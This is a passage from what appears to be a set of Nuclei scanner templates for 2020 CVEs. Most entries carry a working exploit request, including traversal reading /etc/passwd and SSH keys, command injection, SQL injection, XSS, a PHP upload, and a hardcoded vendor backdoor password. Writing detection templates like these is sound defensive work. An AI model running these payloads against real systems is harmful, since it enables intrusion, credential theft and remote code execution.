null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-13121","info":{"name":"Submitty <= 20.04.01 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /authentication/check_login?old=http%253A%252F%252Finteract.sh%252Fhome HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/authentication/login\n\nuser_id={{username}}&password={{password}}&stay_logged_in=on&login=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-22209","info":{"name":"74cms - ajax_common.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%\u9326%27%20union%20select%201,md5({{num}}),3%23%27"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13638","info":{"name":"rConfig 3.9 - Authentication Bypass(Admin Login)","severity":"critical"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"passconf\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"editid\"\n\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--01b28e152ee044338224bf647275f8eb--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["rConfig - Configuration Management","Logged in as","dashboadFieldSet"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-7209","info":{"name":"LinuxKI Toolset <= 6.01 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8615","info":{"name":"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains(body_2, \"success\") && contains(body_2, \"true\") && contains(body_2, \"Instructor has been added successfully\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27838","info":{"name":"KeyCloak - Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["\"clientId\":\\s*\"security-admin-console\"","\"secret\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/event-espresso-core-reg/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Event Espresso","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24391","info":{"name":"Mongo-Express - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndocument=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++\n","GET /public/css/{{randstr}}.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL 